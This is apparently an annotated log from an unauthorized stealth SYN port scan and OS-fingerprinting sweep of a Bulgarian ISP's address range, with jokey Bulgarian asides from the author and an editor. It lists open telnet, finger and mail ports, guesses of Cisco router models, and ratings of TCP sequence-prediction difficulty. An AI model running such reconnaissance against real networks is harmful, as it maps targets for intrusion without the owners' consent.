PU(Resp=Y%DF=N%TOS=0%IPLEN=54%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=F)
Host unnamed.infotel.bg (212.39.64.210) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.210)
The SYN scan took 397 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.210):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.64.211) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.211)
The SYN scan took 397 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.211):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.64.212) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.212)
The SYN scan took 397 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.212):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.64.213) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.222) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.222)
The SYN scan took 20 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.222):
Port State Protocol Service
21 filtered tcp ftp
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT 5 Beta2
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host unnamed.infotel.bg (212.39.64.223) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.223) seems to be a subnet broadcast address (returned 2 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.64.224) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.224) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.64.225) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.225)
The SYN scan took 397 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.225):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.64.226) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.227) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.227)
The SYN scan took 398 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.227):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.64.228) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.228)
The SYN scan took 398 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.228):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.64.229) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.229)
The SYN scan took 398 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.229):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.64.230) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.237) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.237)
The SYN scan took 398 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.237):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.64.238) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.239) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.239) seems to be a subnet broadcast address (returned 2 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.64.240) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.250) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.251) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.251)
The SYN scan took 397 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.251):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.64.252) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.253) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.253)
Adding TCP port 76 (state Firewalled).
<[ orqzal sum tuka vsichki firewall-ed ]>
The SYN scan took 46 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 41980 is closed and neither are firewalled
Insufficient responses for TCP sequencing (0), OS detection will be MUCH less reliable
For OSScan assuming that port 23 is open and port 43706 is closed and neither are firewalled
Insufficient responses for TCP sequencing (0), OS detection will be MUCH less reliable
For OSScan assuming that port 23 is open and port 35179 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.64.253):
(Not showing ports in state: filtered)
Port State Protocol Service
23 open tcp telnet
TCP Sequence Prediction: Class=random positive increments
Difficulty=762 (Medium)
Sequence numbers: 83E273B 83E2ECB 83E2ECB 83E3303 83E3303 83E3830
No OS matches for this host. TCP fingerprints:
T1(Resp=Y%DF=N%W=400%ACK=S++%Flags=AS%Ops=MNNTNW)
TSeq(Class=RI%gcd=1%SI=2FA)
T2(Resp=N)
T1(Resp=N)
T3(Resp=N)
T2(Resp=N)
T4(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=N)
T5(Resp=N)
T4(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T6(Resp=N)
T5(Resp=N)
T7(Resp=N)
T6(Resp=N)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
T7(Resp=N)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
<[blahhh Rozov slon ..... ]>
(Bel.Iron - Mnogo se kefia na rozovite slone;-)
Host unnamed.infotel.bg (212.39.64.254) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.254)
Adding TCP port 109 (state Open).
Adding TCP port 25 (state Open).
The SYN scan took 31 seconds to scan 120 ports.
For OSScan assuming that port 25 is open and port 40102 is closed and neither are firewalled
For OSScan assuming that port 25 is open and port 31708 is closed and neither are firewalled
For OSScan assuming that port 25 is open and port 34977 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.64.254):
Port State Protocol Service
21 filtered tcp ftp
25 open tcp smtp
49 filtered tcp unknown
80 filtered tcp www
109 open tcp pop2
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=random positive increments
Difficulty=9082861 (Good luck!)
Sequence numbers: 319C93F5 319C93F5 30997AC3 30B0FA39 30CB399C 3216313B
No OS matches for this host. TCP fingerprints:
TSeq(Class=RI%gcd=1%SI=B9E8D)
TSeq(Class=RI%gcd=1%SI=C045D)
TSeq(Class=RI%gcd=1%SI=8A97ED)
T1(Resp=Y%DF=N%W=37FF%ACK=S++%Flags=AS%Ops=ME)
T1(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T2(Resp=N)
T3(Resp=Y%DF=N%W=37FF%ACK=S++%Flags=ASF%Ops=ME)
T3(Resp=Y%DF=N%W=37FF%ACK=O%Flags=ASF%Ops=ME)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host unnamed.infotel.bg (212.39.64.255) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.255) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.65.0) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.0) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.65.1) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.1)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 12 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 38687 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 34532 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 38432 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.65.1):
Port State Protocol Service
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
79 open tcp finger
80 filtered tcp www
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=random positive increments
Difficulty=107269 (Good luck!)
Sequence numbers: FCB6A390 FCC29F06 FCCBA98A FCD5E4E7 FCE1E087 FCEFAED4
No OS matches for this host. TCP fingerprints:
TSeq(Class=RI%gcd=1%SI=206AA)
TSeq(Class=RI%gcd=1%SI=9C915)
TSeq(Class=RI%gcd=1%SI=1A305)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.65.2) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.2)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 31 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 34976 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 43700 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 43897 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.65.2):
Port State Protocol Service
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
79 open tcp finger
80 filtered tcp www
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=random positive increments
Difficulty=111526 (Good luck!)
Sequence numbers: 1BDE42A 1DD4865 1FC480C 21DC159 239F510 258491A
No OS matches for this host. TCP fingerprints:
TSeq(Class=RI%gcd=1%SI=192E5)
TSeq(Class=RI%gcd=1%SI=9B208)
TSeq(Class=RI%gcd=1%SI=1B3A6)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
<[ pak rozov slon .... ]>
(Bel.Iron - Oshte poveche se kefia;-) Sigurno tuk mu e miastoto da te
napsuvam, ManiaX, che visia da gi cheta tia laina v 1:30, zashtoto triabva
speshno da se predadat... Mda :-) Chuvstvai se napsuvan :-)
Host unnamed.infotel.bg (212.39.65.3) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.3)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 22 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 36820 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.65.3):
Port State Protocol Service
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
79 open tcp finger
80 filtered tcp www
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=random positive increments
Difficulty=92712 (Worthy challenge)
Sequence numbers: 4531BBC 462B6AE 470E99E 4822651 4922B7B 49F5CB8
Remote operating system guess: Cisco 25XX/45XX Router or 29XX switch (IOS 11.2)
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=16A28)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host unnamed.infotel.bg (212.39.65.4) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.4)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 29 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 31502 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.65.4):
Port State Protocol Service
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
79 open tcp finger
80 filtered tcp www
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=random positive increments
Difficulty=54481 (Worthy challenge)
Sequence numbers: 6C2D17E 6DF23BC 6FCE594 7196BE2 7374C28 7530DFF
Remote operating system guess: Cisco 25XX/45XX Router or 29XX switch (IOS 11.2)
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=D4D1)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host unnamed.infotel.bg (212.39.65.5) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.5)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 13 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 37963 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.65.5):
Port State Protocol Service
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
79 open tcp finger
80 filtered tcp www
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=random positive increments
Difficulty=74713 (Worthy challenge)
Sequence numbers: 86905AA 874B195 882AAE1 88D6034 898B94F 8A56071
Remote operating system guess: Cisco 25XX/45XX Router or 29XX switch (IOS 11.2)
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=123D9)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host unnamed.infotel.bg (212.39.65.6) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.6)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 16 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 38632 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 38063 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.65.6):
Port State Protocol Service
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
79 open tcp finger
80 filtered tcp www
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=random positive increments
Difficulty=91434 (Worthy challenge)
Sequence numbers: AC0C685 AD28E4C AE8606D AFB34D6 B0FCD9A B2398F9
Remote operating system guess: Cisco 25XX/45XX Router or 29XX switch (IOS 11.2)
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=1652A)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host unnamed.infotel.bg (212.39.65.7) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.15) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.15) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.65.16) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.16) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.65.17) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.17)
The SYN scan took 11 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.65.17):
Port State Protocol Service
21 filtered tcp ftp
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
Remote OS guesses: Cisco 7513/3640 Router (IOS 11.2(14)P), Cisco 25XX/45XX Router or 29XX switch (IOS 11.2), IBM Stackable Hub
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.65.18) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.18)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 16 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 41288 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 34587 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 34911 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.65.18):
Port State Protocol Service
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
79 open tcp finger
80 filtered tcp www
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=random positive increments
Difficulty=153366 (Good luck!)
Sequence numbers: FB1FF29 FC0B97D FC9B3C6 FD7F6C8 FE4AF65 FEE6762
No OS matches for this host. TCP fingerprints:
TSeq(Class=RI%gcd=1%SI=949E2)
TSeq(Class=RI%gcd=1%SI=2189D)
TSeq(Class=RI%gcd=1%SI=25716)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host unnamed.infotel.bg (212.39.65.19) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.19)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 12 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 42662 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.65.19):
Port State Protocol Service
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
79 open tcp finger
80 filtered tcp www
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=random positive increments
Difficulty=87562 (Worthy challenge)
Sequence numbers: 10D0192D 10D9FE57 10E56649 10EF2A8F 10FC1FA3 110579DE
Remote operating system guess: Cisco 25XX/45XX Router or 29XX switch (IOS 11.2)
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=1560A)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host unnamed.infotel.bg (212.39.65.20) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.31) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.31) seems to be a subnet broadcast address (returned 2 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.65.32) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.72) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.72)
The SYN scan took 398 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.65.72):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.65.73) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.113) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.113)
The SYN scan took 398 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.65.113):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.65.114) appears to be down, skipping it.
Host pppsof1.infotel.bg (212.39.65.129) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof1.infotel.bg (212.39.65.129)
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
The SYN scan took 441 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on pppsof1.infotel.bg (212.39.65.129):
Port State Protocol Service
21 filtered tcp ftp
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT 5 Beta2
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host pppsof2.infotel.bg (212.39.65.130) appears to be down, skipping it.
Host pppsof3.infotel.bg (212.39.65.131) appears to be down, skipping it.
Host pppsof4.infotel.bg (212.39.65.132) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof4.infotel.bg (212.39.65.132)
The SYN scan took 122 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on pppsof4.infotel.bg (212.39.65.132):
Port State Protocol Service
21 filtered tcp ftp
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT 5 Beta2
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host pppsof5.infotel.bg (212.39.65.133) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof5.infotel.bg (212.39.65.133)
The SYN scan took 33 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on pppsof5.infotel.bg (212.39.65.133):
Port State Protocol Service
21 filtered tcp ftp
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
